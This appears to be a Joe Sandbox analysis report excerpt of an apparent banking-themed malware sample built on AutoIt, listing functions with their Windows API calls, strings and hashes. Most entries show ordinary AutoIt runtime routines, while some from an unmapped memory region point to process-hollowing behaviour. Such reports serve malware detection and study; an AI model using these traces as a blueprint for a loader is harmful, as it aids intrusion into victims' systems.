GetSysColorBrush.USER32(0000000F), ref: 00723074
RegisterClassExW.USER32(00000030), ref: 0072309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007230AF
InitCommonControlsEx.COMCTL32(?), ref: 007230CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007230DC
LoadIconW.USER32(000000A9), ref: 007230F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00723101

Strings

TaskbarCreated, xrefs: 007230A4
+, xrefs: 0072305D
AutoIt v3 GUI, xrefs: 00723090
0, xrefs: 00723056

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 769dd41365096c8f1beb0a0b8ce8c6510ee6bc2fbc46f1564a6ca1d2fa2e7162
Instruction ID: 1f566a5d593e0d86c2ccd7818439e1a261aec4ba69f3836fdc003c1b77da40f6
Opcode Fuzzy Hash: 769dd41365096c8f1beb0a0b8ce8c6510ee6bc2fbc46f1564a6ca1d2fa2e7162
Instruction Fuzzy Hash: 0821C8B1901658AFDB10DFD4EC89B9EBBF4FB0D704F00812AF610AA2A0D7B945448F99

Function 0072708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00724706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007E52F8,?,007237AE,?), ref: 00724724

Part of subcall function 0074050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00727165), ref: 0074052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 007271A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0075E8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0075E909
RegCloseKey.ADVAPI32(?), ref: 0075E947
_wcscat.LIBCMT ref: 0075E9A0

Strings

Software\AutoIt v3\AutoIt, xrefs: 0072719E
\Include\, xrefs: 00727165
Include, xrefs: 0075E8BF, 0075E900
\, xrefs: 0075E9C3

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 4cabf1fe85cbd57065dad95ba272d417fb4cbd2d419ad2be4dddc7805e228522
Instruction ID: 66896688bbfd22b3f6bbc8a83f005ca6d84e02ecae42917a619adccd6cec2163
Opcode Fuzzy Hash: 4cabf1fe85cbd57065dad95ba272d417fb4cbd2d419ad2be4dddc7805e228522
Instruction Fuzzy Hash: 8A71CF71509351DEC304EF25EC859ABBBECFF99350B40852EF544CB1A0EB78A948CB96

Function 00723633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 007236D2
KillTimer.USER32(?,00000001), ref: 007236FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0072371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0072372A
CreatePopupMenu.USER32 ref: 0072373E
PostQuitMessage.USER32(00000000), ref: 0072374D

Strings

TaskbarCreated, xrefs: 00723725
%{, xrefs: 0075D081, 0075D0CF

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated$%{
API String ID: 129472671-2414581122
Opcode ID: 7542c2a235c453c1ae6655165242a47f64299c1a706fb150bcd949db7ad2629e
Instruction ID: d39549d78c7d860aecdd890be41879acf28634995c9c045241433cc3fdb37856
Opcode Fuzzy Hash: 7542c2a235c453c1ae6655165242a47f64299c1a706fb150bcd949db7ad2629e
Instruction Fuzzy Hash: 86419AB120059DFBDF246F68FC8DBB9375CEB09300F504125FA06CA2A2CA6D9E058329

Function 00723A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00723A50
LoadCursorW.USER32(00000000,00007F00), ref: 00723A5F
LoadIconW.USER32(00000063), ref: 00723A76
LoadIconW.USER32(000000A4), ref: 00723A88
LoadIconW.USER32(000000A2), ref: 00723A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00723AC0
RegisterClassExW.USER32(?), ref: 00723B16

Part of subcall function 00723041: GetSysColorBrush.USER32(0000000F), ref: 00723074
Part of subcall function 00723041: RegisterClassExW.USER32(00000030), ref: 0072309E
Part of subcall function 00723041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007230AF
Part of subcall function 00723041: InitCommonControlsEx.COMCTL32(?), ref: 007230CC
Part of subcall function 00723041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007230DC
Part of subcall function 00723041: LoadIconW.USER32(000000A9), ref: 007230F2
Part of subcall function 00723041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00723101

Strings

#, xrefs: 00723AFB
AutoIt v3, xrefs: 00723B05
0, xrefs: 00723AF4

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: a9002fae4f16c112ef4c64a6f23d2ff44461e31f2e37a98427a8e3ebe1e5ef7a
Instruction ID: 87d3ae534d90c24e719f6d109ef698557f93f4c0f461ce9a8b7fc4b3ca1d673c
Opcode Fuzzy Hash: a9002fae4f16c112ef4c64a6f23d2ff44461e31f2e37a98427a8e3ebe1e5ef7a
Instruction Fuzzy Hash: 97214FB1D01358AFEB10DFA4EC89B9D7BB9FB4C715F008129F604AA2A1D3BD55408F98

Function 00723766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CMDLINERAW, xrefs: 007237FB
/ErrorStdOut, xrefs: 0072387D
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 007237AE
/AutoIt3ExecuteLine, xrefs: 007238A7
/AutoIt3ExecuteScript, xrefs: 007238BC
/AutoIt3OutputDebug, xrefs: 00723892
CMDLINE, xrefs: 00723822
R~, xrefs: 0075D213

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$R~
API String ID: 1825951767-576807863
Opcode ID: 9e88ef77f9e82cc8ca9535b496b923d535504affe4f8efd4a23d90b535696db4
Instruction ID: 1284636bfcb05e1f6ca53fbc0171f84fd20e014d369ce64183d941d11fa16f8b
Opcode Fuzzy Hash: 9e88ef77f9e82cc8ca9535b496b923d535504affe4f8efd4a23d90b535696db4
Instruction Fuzzy Hash: ACA14B72D0026DEACB14EBA0EC99AEEB778BF15304F440529F515B7191DF7C6A08CB60

Function 0072F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00740162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00740193
Part of subcall function 00740162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0074019B
Part of subcall function 00740162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 007401A6
Part of subcall function 00740162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 007401B1
Part of subcall function 00740162: MapVirtualKeyW.USER32(00000011,00000000), ref: 007401B9
Part of subcall function 00740162: MapVirtualKeyW.USER32(00000012,00000000), ref: 007401C1

Part of subcall function 007360F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0072F930), ref: 00736154

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0072F9CD
OleInitialize.OLE32(00000000), ref: 0072FA4A
CloseHandle.KERNEL32(00000000), ref: 007645C8

Strings

\T~, xrefs: 0072F7F7
%{, xrefs: 0072F796, 0072F7A8, 0072F96E, 0072FA51
<W~, xrefs: 0072F930
S~, xrefs: 0072F7EB

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: <W~$\T~$%{$S~
API String ID: 1986988660-2274366471
Opcode ID: df1cbfc1a2c54bb6099d384cd72c6de0a0907d24f7859313ab2a300c3837a207
Instruction ID: 9d5b57dbfbe4c4759b0b7ad166d5c321bad612a180be381d6fd31bf93cdac5a7
Opcode Fuzzy Hash: df1cbfc1a2c54bb6099d384cd72c6de0a0907d24f7859313ab2a300c3837a207
Instruction Fuzzy Hash: F98190B0903AC9CEC384DF69A984A597BE5AB4E30E750C13AD119CF2A2E77C4494CF19

Function 01F825E0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01F826B1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01F828D7

Memory Dump Source

Source File: 00000000.00000002.2120408432.0000000001F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f80000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction ID: 5c703ac219d6c1417ec89d5098493cf04f3af2f14c65ff1ba265b219c34b5819
Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction Fuzzy Hash: 61A10775E00209EBDF14EFA4C994BAEBBB5FF48704F208159E501BB281D776AA41CF94

Function 007239D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00723A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00723A24
ShowWindow.USER32(00000000,?,?), ref: 00723A38
ShowWindow.USER32(00000000,?,?), ref: 00723A41

Strings

AutoIt v3, xrefs: 007239FB, 00723A00, 00723A01
edit, xrefs: 00723A1E

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 40fd014b47f25c876dd1a030e2ae780d4c36d07d88804c6b548d296911c72df9
Instruction ID: 88ebba3a5f6bab4ef9a729d7890f607c133220f176454f146e27a3089afcb376
Opcode Fuzzy Hash: 40fd014b47f25c876dd1a030e2ae780d4c36d07d88804c6b548d296911c72df9
Instruction Fuzzy Hash: A0F030B05026D47EEA3057536C88E773E7DE7CBF64B008129FB00A6171C1691840CA78

Function 01F823B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 143
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01F822A0: Sleep.KERNELBASE(000001F4), ref: 01F822B1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01F824CC

Strings

5JQ384JD2E5FW2SXN, xrefs: 01F8252F, 01F82532

Memory Dump Source

Source File: 00000000.00000002.2120408432.0000000001F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f80000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: CreateFileSleep
String ID: 5JQ384JD2E5FW2SXN
API String ID: 2694422964-3359981271
Opcode ID: 05bd7ba4e3466ef88773a4d3c5241edd257731cc0c176f0127774519a4b31b12
Instruction ID: acfd420aff96f789ed88653e7c2fa07055618a783149e85bbe1858bb004978d7
Opcode Fuzzy Hash: 05bd7ba4e3466ef88773a4d3c5241edd257731cc0c176f0127774519a4b31b12
Instruction Fuzzy Hash: 5D519031D04249EBEF11EBB4CC55BEEBBB9AF54300F004199E209BB2C1D6BA1B45CB65

Function 0072407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0075D3D7

Part of subcall function 00727BCC: _memmove.LIBCMT ref: 00727C06

_memset.LIBCMT ref: 007240FC
_wcscpy.LIBCMT ref: 00724150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00724160

Strings

Line: , xrefs: 0075D400

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: df4e698a5b55bb6376cb228a97a625928a53ff2c36fad027ae6373bc5c7b27fd
Instruction ID: 593434560fbc666c89ce5a0d8fe4920081ffc6386421f4bb516e7f79822ac748
Opcode Fuzzy Hash: df4e698a5b55bb6376cb228a97a625928a53ff2c36fad027ae6373bc5c7b27fd
Instruction Fuzzy Hash: 4531D2B1009358ABD734EB60EC4AFDB77DCAF44304F10891EF685860A1DB7CA648C796

Function 0072686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00724DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,007E52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00724E0F

_free.LIBCMT ref: 0075E263
_free.LIBCMT ref: 0075E2AA

Part of subcall function 00726A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00726BAD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 0075E039
Bad directive syntax error, xrefs: 0075E292

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: a88e79036b4c2d125cccbbf5101a417849738e65d94de8f97efe4e3caccd97bb
Instruction ID: 751b784b568cc8db3629cda566bae38c741bc02b3223d3b7b34282b057d93ca7
Opcode Fuzzy Hash: a88e79036b4c2d125cccbbf5101a417849738e65d94de8f97efe4e3caccd97bb
Instruction Fuzzy Hash: C3918271900229EFCF08EFA4DC859EDB7B4FF05311F10442AF815AB2A1DBB8AA55CB50

Function 007235B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,007235A1,SwapMouseButtons,00000004,?), ref: 007235D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,007235A1,SwapMouseButtons,00000004,?,?,?,?,00722754), ref: 007235F5
RegCloseKey.KERNELBASE(00000000,?,?,007235A1,SwapMouseButtons,00000004,?,?,?,?,00722754), ref: 00723617

Strings

Control Panel\Mouse, xrefs: 007235D2

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 0639672ab7716e77ea82fdbe614eeb8a7d2512d2448094a50f7f40b7d6a50c33
Instruction ID: 063cf89c087ce0d4142daec0136543b53aae46fc506ce0df90e7d426a95571d7
Opcode Fuzzy Hash: 0639672ab7716e77ea82fdbe614eeb8a7d2512d2448094a50f7f40b7d6a50c33
Instruction Fuzzy Hash: B8115771610228BFDB208FA4EC80EAFBBBCEF45740F019469F805D7210E2799F409BA4

Function 01F812A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 01F81A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01F81AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01F81B13

Memory Dump Source

Source File: 00000000.00000002.2120408432.0000000001F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f80000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
Instruction ID: 80710c93f89615058edd2eb08cc11f25bf558e5548315e4de3e4b1b0c080325f
Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
Instruction Fuzzy Hash: 52620A30A14658DBEB24DFA4C850BDEB772EF58700F1091A9D20DEB390E7769E81CB59

Function 0078955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00724EE5: _fseek.LIBCMT ref: 00724EFD

Part of subcall function 00789734: _wcscmp.LIBCMT ref: 00789824
Part of subcall function 00789734: _wcscmp.LIBCMT ref: 00789837

_free.LIBCMT ref: 007896A2
_free.LIBCMT ref: 007896A9
_free.LIBCMT ref: 00789714

Part of subcall function 00742D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00749A24), ref: 00742D69
Part of subcall function 00742D55: GetLastError.KERNEL32(00000000,?,00749A24), ref: 00742D7B

_free.LIBCMT ref: 0078971C

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction ID: 535139af71ab394b71e17d03dfc64c6fab09587e937e9a458ae008e27d733c9e
Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
Instruction Fuzzy Hash: E85160B1E04258EFDF259F64DC85AAEBB79EF48300F14049EF209A3241DB755A91CF58

Function 0074470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007447A0
__flush.LIBCMT ref: 007447C0
__write.LIBCMT ref: 007447F3
__flsbuf.LIBCMT ref: 00744821

Part of subcall function 00748B28: __getptd_noexit.LIBCMT ref: 00748B28

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 4d52eff99123aac4a06db8725133cf03f23f84e976aa4ad933b544abe1f9a118
Instruction ID: 7cdae8fd26cdfe7cce9a9810afe97b253cd47cc0e7788747fef50976615ac312
Opcode Fuzzy Hash: 4d52eff99123aac4a06db8725133cf03f23f84e976aa4ad933b544abe1f9a118
Instruction Fuzzy Hash: 8441D374B00746EFDB19CF69C884AAE77A9EF42360B24813DE815C7640EB78DD42AB40

Function 00724C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00724CBA

Strings

AU3!P/{, xrefs: 00724CB4
EA06, xrefs: 0075D8CC

Memory Dump Source

Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd

Similarity

API ID: _memmove
String ID: AU3!P/{$EA06
API String ID: 4104443479-1001243050
Opcode ID: 4901804f5ca37af24688f7e69c9d25f0145db5d9da132401c4d9ffc44655cc57
Instruction ID: 20a79b4337c7cd824d7f07bac6685b942785be9c8a3b58a8d0f5c0538edc6460
Opcode Fuzzy Hash: 4901804f5ca37af24688f7e69c9d25f0145db5d9da132401c4d9ffc44655cc57
